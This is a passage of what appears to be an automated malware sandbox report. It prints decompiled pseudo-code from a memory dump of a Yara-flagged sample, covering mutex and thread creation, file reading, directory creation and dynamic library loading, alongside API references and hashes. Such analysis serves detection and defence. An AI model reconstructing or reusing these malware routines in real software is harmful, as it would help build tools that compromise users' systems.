							_t26 = E00AF95E2( &(_t38[_t39]), _v12 - _t39, "%u;%u;%u",  *((intOrPtr*)(_t29 + _t22)));
							_t31 =  *0xb0e710; // 0x2
							_t40 = _t40 + 0x18;
							_t36 = _v8;
							_t39 = _t39 + _t26;
						}
						_t36 = _t36 + 1;
						_t29 = _t29 + 0x20;
						_v8 = _t36;
					} while (_t36 < _t31);
					goto L9;
				}
				return _t16 | 0xffffffff;
			}
















                                                                                                                                                                                                0x00af2ae3
                                                                                                                                                                                                0x00af2aed
                                                                                                                                                                                                0x00af2af0
                                                                                                                                                                                                0x00af2af3
                                                                                                                                                                                                0x00af2af8
                                                                                                                                                                                                0x00af2afa
                                                                                                                                                                                                0x00af2b00
                                                                                                                                                                                                0x00af2b0a
                                                                                                                                                                                                0x00af2b10
                                                                                                                                                                                                0x00af2b12
                                                                                                                                                                                                0x00af2b17
                                                                                                                                                                                                0x00af2b74
                                                                                                                                                                                                0x00af2b7a
                                                                                                                                                                                                0x00af2b7e
                                                                                                                                                                                                0x00af2b89
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af2b90
                                                                                                                                                                                                0x00af2b19
                                                                                                                                                                                                0x00af2b1b
                                                                                                                                                                                                0x00af2b1b
                                                                                                                                                                                                0x00af2b24
                                                                                                                                                                                                0x00af2b28
                                                                                                                                                                                                0x00af2b30
                                                                                                                                                                                                0x00af2b36
                                                                                                                                                                                                0x00af2b36
                                                                                                                                                                                                0x00af2b37
                                                                                                                                                                                                0x00af2b3c
                                                                                                                                                                                                0x00af2b40
                                                                                                                                                                                                0x00af2b56
                                                                                                                                                                                                0x00af2b5b
                                                                                                                                                                                                0x00af2b61
                                                                                                                                                                                                0x00af2b64
                                                                                                                                                                                                0x00af2b67
                                                                                                                                                                                                0x00af2b67
                                                                                                                                                                                                0x00af2b69
                                                                                                                                                                                                0x00af2b6a
                                                                                                                                                                                                0x00af2b6d
                                                                                                                                                                                                0x00af2b70
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af2b1b
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • lstrcatA.KERNEL32(00000000,00B0B99C,00AF5731,-00000020,00000000,?,00000000,?,?,?,?,?,?,?,00AF5731), ref: 00AF2B30
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AllocateHeaplstrcat
                                                                                                                                                                                                • String ID: %u;%u;%u
                                                                                                                                                                                                • API String ID: 3011335133-2973439046
                                                                                                                                                                                                • Opcode ID: c324a48f56becb61e8b997a79b56900a1fc6eb19c7060e09008627dd3fec4bda
                                                                                                                                                                                                • Instruction ID: aebc2814021d7694a1ebb4f8e1b5e10b16e8d783f59d40e48fdf8124c77d6454
                                                                                                                                                                                                • Opcode Fuzzy Hash: c324a48f56becb61e8b997a79b56900a1fc6eb19c7060e09008627dd3fec4bda
                                                                                                                                                                                                • Instruction Fuzzy Hash: D3118132A00208ABDB15DFEDDD85E7A7BB9FB84310B1049A9FA25D71A1DF30D940CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF98CF, Relevance: 3.1, APIs: 2, Instructions: 133COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                			E00AF98CF(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0xb0e76c; // 0x39c
				_t73 = 0;
				if(E00AFA501(_t77, 0x7530) >= 0) {
					_t45 =  *0xb0e770; // 0x4d34178
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0xb0e770; // 0x4d34178
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0xb0e770; // 0x4d34178
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0xb0e770; // 0x4d34178
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E00AFA4B3(0, 1);
									_t82 =  *0xb0e770; // 0x4d34178
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0xb0e770; // 0x4d34178
									_t30 = _t83 + _t113 + 4; // 0x4d3417c
									_t52 = CreateThread(_t73, _t73, E00AF9887, _t83 + _t113, _t73, _t30);
									_t53 =  *0xb0e770; // 0x4d34178
									 *(_t113 + _t53) = _t52;
									_t54 =  *0xb0e770; // 0x4d34178
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0xb0e770; // 0x4d34178
										 *0xb0e774 =  *0xb0e774 + 1;
										E00AFA51D( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0xb0e770; // 0x4d34178
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0xb0e684; // 0x4d3f6c8
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0xb0e770; // 0x4d34178
										_t37 = _t61 + 0xc; // 0x4d34184
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E00AF85FB(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0xb0e770; // 0x4d34178
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0xb0e76c; // 0x39c
									E00AFA51D(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E00AF85E5(_t110);
								_t97 =  *0xb0e770; // 0x4d34178
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0xb0e770; // 0x4d34178
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0xb0e770; // 0x4d34178
								E00AF86C2( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0xb0e684; // 0x4d3f6c8
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0xb0e770; // 0x4d34178
							goto L7;
						}
						_t98 =  *0xb0e770; // 0x4d34178
						E00AF982B(_t106 + _t98, 0);
						_t45 =  *0xb0e770; // 0x4d34178
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}





































                                                                                                                                                                                                0x00af98d2
                                                                                                                                                                                                0x00af98d3
                                                                                                                                                                                                0x00af98d4
                                                                                                                                                                                                0x00af98dc
                                                                                                                                                                                                0x00af98df
                                                                                                                                                                                                0x00af98e6
                                                                                                                                                                                                0x00af98ef
                                                                                                                                                                                                0x00af98f8
                                                                                                                                                                                                0x00af98ff
                                                                                                                                                                                                0x00af9901
                                                                                                                                                                                                0x00af9903
                                                                                                                                                                                                0x00af9903
                                                                                                                                                                                                0x00af9908
                                                                                                                                                                                                0x00af9930
                                                                                                                                                                                                0x00af9933
                                                                                                                                                                                                0x00af994d
                                                                                                                                                                                                0x00af9953
                                                                                                                                                                                                0x00af9993
                                                                                                                                                                                                0x00af9997
                                                                                                                                                                                                0x00af999c
                                                                                                                                                                                                0x00af99a0
                                                                                                                                                                                                0x00af99a0
                                                                                                                                                                                                0x00af99ac
                                                                                                                                                                                                0x00af99b0
                                                                                                                                                                                                0x00af99b8
                                                                                                                                                                                                0x00af99be
                                                                                                                                                                                                0x00af99c3
                                                                                                                                                                                                0x00af99c9
                                                                                                                                                                                                0x00af99cd
                                                                                                                                                                                                0x00af99d5
                                                                                                                                                                                                0x00af99e7
                                                                                                                                                                                                0x00af99ec
                                                                                                                                                                                                0x00af99f1
                                                                                                                                                                                                0x00af99f4
                                                                                                                                                                                                0x00af99f9
                                                                                                                                                                                                0x00af99fe
                                                                                                                                                                                                0x00af9a3a
                                                                                                                                                                                                0x00af9a40
                                                                                                                                                                                                0x00af9a46
                                                                                                                                                                                                0x00af9a50
                                                                                                                                                                                                0x00af9a55
                                                                                                                                                                                                0x00af9a5b
                                                                                                                                                                                                0x00af9a00
                                                                                                                                                                                                0x00af9a04
                                                                                                                                                                                                0x00af9a09
                                                                                                                                                                                                0x00af9a0c
                                                                                                                                                                                                0x00af9a11
                                                                                                                                                                                                0x00af9a14
                                                                                                                                                                                                0x00af9a18
                                                                                                                                                                                                0x00af9a1f
                                                                                                                                                                                                0x00af9a24
                                                                                                                                                                                                0x00af9a2a
                                                                                                                                                                                                0x00af9a32
                                                                                                                                                                                                0x00af9a33
                                                                                                                                                                                                0x00af9a33
                                                                                                                                                                                                0x00af9a5d
                                                                                                                                                                                                0x00af9a5d
                                                                                                                                                                                                0x00af9a63
                                                                                                                                                                                                0x00af9a69
                                                                                                                                                                                                0x00af9a6c
                                                                                                                                                                                                0x00af9a6e
                                                                                                                                                                                                0x00af9a6e
                                                                                                                                                                                                0x00af9955
                                                                                                                                                                                                0x00af9959
                                                                                                                                                                                                0x00af995f
                                                                                                                                                                                                0x00af9965
                                                                                                                                                                                                0x00af9969
                                                                                                                                                                                                0x00af9972
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9978
                                                                                                                                                                                                0x00af997c
                                                                                                                                                                                                0x00af9989
                                                                                                                                                                                                0x00af998e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af998e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9933
                                                                                                                                                                                                0x00af990a
                                                                                                                                                                                                0x00af990f
                                                                                                                                                                                                0x00af9910
                                                                                                                                                                                                0x00af9919
                                                                                                                                                                                                0x00af9946
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9946
                                                                                                                                                                                                0x00af991b
                                                                                                                                                                                                0x00af9926
                                                                                                                                                                                                0x00af992b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9935
                                                                                                                                                                                                0x00af9935
                                                                                                                                                                                                0x00af9938
                                                                                                                                                                                                0x00af9939
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af9941
                                                                                                                                                                                                0x00af98f1
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 072c76dc5e51e48803ad786c2f5f7ded560589769c7f4601eabeffaf8e584483
                                                                                                                                                                                                • Instruction ID: 1385168bfaad1c02a921313e249f3ea097a5ac52c9cf57b19c6c05b853fcfc9f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 072c76dc5e51e48803ad786c2f5f7ded560589769c7f4601eabeffaf8e584483
                                                                                                                                                                                                • Instruction Fuzzy Hash: F5514771610604DFC72ADFA8E980976B3F9FB683147548D2DF6AA93261CE71EC02CB40
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFA6EB, Relevance: 3.1, APIs: 2, Instructions: 90fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 27%
                                                                                                                                                                                                			E00AFA6EB(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E00AFA67D(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0xb0e684; // 0x4d3f6c8
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0xb0e684; // 0x4d3f6c8
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E00AF85FB( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E00AF85E5(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							FindCloseChangeNotification(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}














                                                                                                                                                                                                0x00afa6ee
                                                                                                                                                                                                0x00afa6ef
                                                                                                                                                                                                0x00afa6f0
                                                                                                                                                                                                0x00afa6f4
                                                                                                                                                                                                0x00afa6f6
                                                                                                                                                                                                0x00afa6fb
                                                                                                                                                                                                0x00afa70b
                                                                                                                                                                                                0x00afa70f
                                                                                                                                                                                                0x00afa799
                                                                                                                                                                                                0x00afa799
                                                                                                                                                                                                0x00afa79b
                                                                                                                                                                                                0x00afa79d
                                                                                                                                                                                                0x00afa79f
                                                                                                                                                                                                0x00afa79f
                                                                                                                                                                                                0x00afa715
                                                                                                                                                                                                0x00afa723
                                                                                                                                                                                                0x00afa727
                                                                                                                                                                                                0x00afa77f
                                                                                                                                                                                                0x00afa77f
                                                                                                                                                                                                0x00afa785
                                                                                                                                                                                                0x00afa78a
                                                                                                                                                                                                0x00afa792
                                                                                                                                                                                                0x00afa798
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa78a
                                                                                                                                                                                                0x00afa729
                                                                                                                                                                                                0x00afa72d
                                                                                                                                                                                                0x00afa732
                                                                                                                                                                                                0x00afa734
                                                                                                                                                                                                0x00afa73a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa73e
                                                                                                                                                                                                0x00afa741
                                                                                                                                                                                                0x00afa742
                                                                                                                                                                                                0x00afa748
                                                                                                                                                                                                0x00afa749
                                                                                                                                                                                                0x00afa74a
                                                                                                                                                                                                0x00afa76f
                                                                                                                                                                                                0x00afa751
                                                                                                                                                                                                0x00afa7a3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa7a5
                                                                                                                                                                                                0x00afa7a8
                                                                                                                                                                                                0x00afa7ae
                                                                                                                                                                                                0x00afa7b0
                                                                                                                                                                                                0x00afa7b0
                                                                                                                                                                                                0x00afa7b8
                                                                                                                                                                                                0x00afa7bb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa7bb
                                                                                                                                                                                                0x00afa759
                                                                                                                                                                                                0x00afa75c
                                                                                                                                                                                                0x00afa760
                                                                                                                                                                                                0x00afa762
                                                                                                                                                                                                0x00afa765
                                                                                                                                                                                                0x00afa76a
                                                                                                                                                                                                0x00afa76e
                                                                                                                                                                                                0x00afa76e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afa76f
                                                                                                                                                                                                0x00afa6fd
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00AFFA98,00000000,00AFF8F7,00B1EFE0,00B0B98C,00000000,00B0B98C,00000000,00000000,00000615), ref: 00AFA775
                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,00AFFA98,00000000,00AFF8F7,00B1EFE0,00B0B98C,00000000,00B0B98C,00000000,00000000,00000615,0000034A,00000000,04D3FB08,00000400), ref: 00AFA7B8
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ChangeCloseFileFindNotificationRead
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1200561807-0
                                                                                                                                                                                                • Opcode ID: 035647912d50d9bd596ba1c24fea76015a802142d0fc26d8dfa81fa0b5a24796
                                                                                                                                                                                                • Instruction ID: 635f4cee983500f0b34f73ca8d9c49f768cc140e75b4c71f036a72b04a9d2e4f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 035647912d50d9bd596ba1c24fea76015a802142d0fc26d8dfa81fa0b5a24796
                                                                                                                                                                                                • Instruction Fuzzy Hash: F92151B6600209AFDB11DFA4DD84FFA77BCAF64740F10856ABA09D7251EA70D940CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF1521, Relevance: 3.1, APIs: 2, Instructions: 69synchronizationCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 76%
                                                                                                                                                                                                			E00AF1521(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0); // executed
				 *0xb0e6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0xb0e6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E00AF1080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0xb0e6e8 = E00AF9187(_t3, 0);
							E00AF85A3( &_v8);
							_t7 = E00AF85E5(0x100);
							 *0xb0e6f0 = _t7;
							if(_t7 != 0) {
								 *0xb0e6fc = 0;
								_t9 = E00AF85E5(0x401);
								 *0xb0e6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0xb0e6c0; // 0x0
									if(__eflags == 0) {
										E00B015EE(E00AF81E3, 0xaf81ec);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E00AFE1FE(0xb0bd20, _t24); // executed
									 *0xb0e6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}










                                                                                                                                                                                                0x00af1524
                                                                                                                                                                                                0x00af152b
                                                                                                                                                                                                0x00af1531
                                                                                                                                                                                                0x00af1538
                                                                                                                                                                                                0x00af15ed
                                                                                                                                                                                                0x00af15ed
                                                                                                                                                                                                0x00af15ed
                                                                                                                                                                                                0x00af153e
                                                                                                                                                                                                0x00af1541
                                                                                                                                                                                                0x00af1547
                                                                                                                                                                                                0x00af154e
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1554
                                                                                                                                                                                                0x00af1559
                                                                                                                                                                                                0x00af155e
                                                                                                                                                                                                0x00af1563
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af1569
                                                                                                                                                                                                0x00af1575
                                                                                                                                                                                                0x00af157a
                                                                                                                                                                                                0x00af1584
                                                                                                                                                                                                0x00af1589
                                                                                                                                                                                                0x00af1591
                                                                                                                                                                                                0x00af159f
                                                                                                                                                                                                0x00af15a5
                                                                                                                                                                                                0x00af15aa
                                                                                                                                                                                                0x00af15b0
                                                                                                                                                                                                0x00af15b2
                                                                                                                                                                                                0x00af15b8
                                                                                                                                                                                                0x00af15be
                                                                                                                                                                                                0x00af15ca
                                                                                                                                                                                                0x00af15d0
                                                                                                                                                                                                0x00af15d1
                                                                                                                                                                                                0x00af15d8
                                                                                                                                                                                                0x00af15de
                                                                                                                                                                                                0x00af15e3
                                                                                                                                                                                                0x00af15e8
                                                                                                                                                                                                0x00af15b4
                                                                                                                                                                                                0x00af15b4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af15b4
                                                                                                                                                                                                0x00af1593
                                                                                                                                                                                                0x00af1593
                                                                                                                                                                                                0x00af1595
                                                                                                                                                                                                0x00af1595
                                                                                                                                                                                                0x00af1595
                                                                                                                                                                                                0x00af1591
                                                                                                                                                                                                0x00af1563
                                                                                                                                                                                                0x00af154e
                                                                                                                                                                                                0x00af15f2

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00000000,?,?,?,00AF56FA), ref: 00AF152B
                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,00AF56FA), ref: 00AF1541
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateMutex$AllocateHeap
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 704353917-0
                                                                                                                                                                                                • Opcode ID: e0257d53ede65d9cbe7e97578036a8bd2df063e29f77d6720906093dba30a909
                                                                                                                                                                                                • Instruction ID: 1bed7fbfdd067c19bc9799a712d49a4fc4d0dd790e80f74d1d98407e67654069
                                                                                                                                                                                                • Opcode Fuzzy Hash: e0257d53ede65d9cbe7e97578036a8bd2df063e29f77d6720906093dba30a909
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1611A770A0520EEAEB149BF6BD15D377AA5EBF17607200A2AF722CB1D0FF71C5008615
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFE1FE, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 47%
                                                                                                                                                                                                			E00AFE1FE(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E00AF95A8(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E00AFE1B3(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E00AF85A3( &_v8);
				return _t25;
			}










                                                                                                                                                                                                0x00afe201
                                                                                                                                                                                                0x00afe204
                                                                                                                                                                                                0x00afe20a
                                                                                                                                                                                                0x00afe20c
                                                                                                                                                                                                0x00afe211
                                                                                                                                                                                                0x00afe213
                                                                                                                                                                                                0x00afe21d
                                                                                                                                                                                                0x00afe21e
                                                                                                                                                                                                0x00afe22d
                                                                                                                                                                                                0x00afe220
                                                                                                                                                                                                0x00afe220
                                                                                                                                                                                                0x00afe220
                                                                                                                                                                                                0x00afe231
                                                                                                                                                                                                0x00afe238
                                                                                                                                                                                                0x00afe23e
                                                                                                                                                                                                0x00afe23e
                                                                                                                                                                                                0x00afe243
                                                                                                                                                                                                0x00afe24e

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,00B0BA20), ref: 00AFE220
                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(00000000,00000000,00000001,?,00B0BA20), ref: 00AFE22D
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4133054770-0
                                                                                                                                                                                                • Opcode ID: 9f8ea93e4b49e53c55ad3a0b93e3708f77ad60a2f1fd3886e01231263083226d
                                                                                                                                                                                                • Instruction ID: 54d7173adea0368ac2367046114dbea322e5341e281d587e5991f1b88a6a13a5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f8ea93e4b49e53c55ad3a0b93e3708f77ad60a2f1fd3886e01231263083226d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 58F089316001189BDB04ABE9ED458EAB3ED9BA43507144129F605D7161ED70DE408690
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AF2C82, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 65%
                                                                                                                                                                                                			E00AF2C82(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E00AFB742(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E00AFBBCF(_t70) == 0) {
					_t23 = E00AF2B97( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E00AF2C57( &_v1084, __eflags);
					} else {
						E00AFB054(_t54,  &_v564); // executed
						_t32 = E00AF109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E00AF92C6( &_v1084);
						E00AF85B6( &_v12);
					}
				} else {
					_t38 = E00AF109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0xb0e684; // 0x4d3f6c8
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E00AF109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E00AF92C6( &_v564);
						E00AF85B6( &_v8);
					} else {
						_t71 = E00AF2C57( &_v44, _t78);
					}
					E00AF85B6( &_v12);
				}
				_v8 = _t71;
				_t25 = E00AFB2AB(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E00AFB2AB(_t71) == 0) {
						E00AF85FB( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}























                                                                                                                                                                                                0x00af2c91
                                                                                                                                                                                                0x00af2c93
                                                                                                                                                                                                0x00af2c96
                                                                                                                                                                                                0x00af2c9c
                                                                                                                                                                                                0x00af2ca5
                                                                                                                                                                                                0x00af2d29
                                                                                                                                                                                                0x00af2d2e
                                                                                                                                                                                                0x00af2d2f
                                                                                                                                                                                                0x00af2d31
                                                                                                                                                                                                0x00af2d82
